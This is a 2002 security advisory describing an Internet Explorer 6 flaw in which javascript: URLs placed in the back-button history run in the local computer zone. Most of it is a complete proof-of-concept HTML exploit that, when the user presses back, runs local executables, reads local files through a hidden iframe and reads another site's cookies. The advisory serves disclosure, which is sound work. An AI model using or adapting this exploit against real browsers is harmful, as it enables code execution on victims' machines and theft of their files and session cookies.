26th Sep 2002 [SBWID-5274]
COMMAND
IE back button can cause execution of script from history URL's
SYSTEMS AFFECTED
IE 6.0 at least
PROBLEM
In Andreas Sandblad [[email protected]] post :
IE allows urls containing the javascript protocol in the history list.
Code injected in the url will operate in the same zone/domain as the
last url viewed. The javascript url can be set to trigger when a user
presses the backbutton.
The normal behaviour when a page fails to load is to press the
backbutton. The error page shown by IE is operating in the local
computer zone (res://C:\WINNT\System32\shdoclc.dll/dnserror.htm# on
Win2000). Thus, we can execute code and read local files.
EXPLOIT
=======
The exploit works as follow: Press one of the links and then the back
button.
Note: Exploit has only been tested on fully patched IE 6.0, with Win XP
and Win2000 pro (assume other OS are also vulnerable). Winmine.exe and
test.txt must exist.
--------------------------CUT HERE-------------------------------
<html>
<h1>Press link and then the backbutton to trigger script.</h1>
<a href="javascript:execFile('file:///c:/winnt/system32/winmine.exe')">
Run Minesweeper (c:/winnt/system32/winmine.exe Win2000 pro)</a><br>
<a href="javascript:execFile('file:///c:/windows/system32/winmine.exe')">
Run Minesweeper (c:/windows/system32/winmine.exe XP, ME etc...)</a><br>
<a href="javascript:readFile('file:///c:/test.txt')">
Read c:\test.txt (needs to be created)</a><br>
<a href="javascript:readCookie('http://www.google.com/')">
Read Google cookie</a>
<script>
// badUrl = "http://www.nonexistingdomain.se"; // Use if not XP
badUrl = "res:";
function execFile(file){
s = '<object classid=CLSID:11111111-1111-1111-1111-111111111111 ';
s+= 'CODEBASE='+file+'></OBJECT>';
backBug(badUrl,s);
}
function readFile(file){
s = '<iframe name=i src='+file+' style=display:none onload=';
s+= 'alert(i.document.body.innerText)></iframe>';
backBug(badUrl,s);
}
function readCookie(url){
s = '<script>alert(document.cookie);close();<"+"/script>';
backBug(url,s);
}
function backBug(url,payload){
len = history.length;
page = document.location;
s = "javascript:if (history.length!="+len+") {";
s+= "open('javascript:document.write(\""+payload+"\")')";
s+= ";history.back();} else '<script>location=\""+url
s+= "\";document.title=\""+page+"\";<"+"/script>';";
location = s;
}
</script>
</html>
--------------------------CUT HERE-------------------------------
_ _
o' \,=./ `o
(o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---
SOLUTION
None yet.